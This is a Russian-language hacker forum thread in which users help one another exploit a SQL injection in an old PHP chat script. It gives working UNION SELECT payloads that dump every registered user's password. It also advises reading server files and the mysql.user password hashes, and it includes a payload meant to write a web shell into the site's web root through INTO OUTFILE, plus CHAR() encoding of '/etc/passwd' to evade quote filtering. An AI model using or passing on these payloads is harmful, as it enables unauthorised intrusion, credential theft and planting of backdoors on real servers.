Уважаемые,очень прошу помочь мне разобраться со следующей конструкцией: На одном сервере установлен древний php скрипт одного чата с mysql базой. Уязвимость заключается в скрипте редактирование профайла пользователей.Пример Запрос,типа http://mysite.com/chе/usrs.php?L=russia&R='%20UNION%20SELECT%20pass,null,null, null%20FROM%20%20register_user%20/* выдаст нам из таблицы register_user все пароли зарегестрированных пользователей. Таким образом можно узнать все данные из базы данных. А теперь самое интересное,как мне модифицировать запрос,чтобы я смог работать(просматривать) файлы на сервере.Буду очень благодарен!
Спасибо за помощь! Очень помог!!!! Кста как ты правильно первый файл указал))) p.s. please change your last post (address) И еще один вопрос: возможно ли получить список файлов в какой-либо директории при помощи данной injection (права позволяют)
Нет, читать содержимое директорий не получится. Но если тебе хватает прав на чтение файлов, то можешь попробовать следующие вещи: 1. Залить шелл: Дальше по анологии. Только не забудь поменять директорию, где есть права на запись. 2. Просмотри поле mysql.user.password в таблице mysql.user.
http://site.com/vivat.php?r=russian&R='+UNION+SELECT+LOAD_FILE('http://www.hiliv.narod.ru/shell.txt') ,null,null,null+FROM+reg_user+into+outfile+'/usr/local/www/site.com/picnic/shell.php'/* На месте,где указан http адрес шелла http://www.hiliv.narod.ru/shell.txt, MySql громко икает с собщением об обшибке.Думаю виной здесь двойной слеш //. Можно ли как-то сформировать в данном случае успешный запрос.Заранее Приношу извинения за назойливость и огромное спасибо.
Забыл написать: Выкидывается ошибка "MySQL error: 13 (Can't get stat of 'http:/www.hiliv.narod.ru/shell.txt'' (Errcode: 2)) "
insidex, LOAD_FILE('http://www.hiliv.narod.ru/shell.txt') так нельзя, можно читать только локальные файлы. Также у тебя должны быть права на чтение этого файла и он не должен превышать определенного размера, установленного на сервере.
Спасибо за информацию! Ну тогла скажите,возможно ли записать через эту уязвимость в файл на сервере то,что у k1b0rg в подписи
К сожалению нет,пишет зараза: MySQL error: 1267 (Illegal mix of collations (utf8_general_ci,IMPLICIT) and (cp1251_general_ci,COERCIBLE) for operation 'UNION')
Подскажите Ньюбу Есть инъекция. Хочу сформировать запрос на заливку шела. Кавычки не прокатывают. Хочу использовать функцию Char. Внимание вопрос. Есть ли какой то простой вариант приобразовывать строку в Char символы? Т.е. В виде примера ('/etc/passwd') в строку типа ,(char(47,101,116,99,47,112,97,115,115,119,100)) соответственно хочется конвертить свою строку. Заранее спасиба.
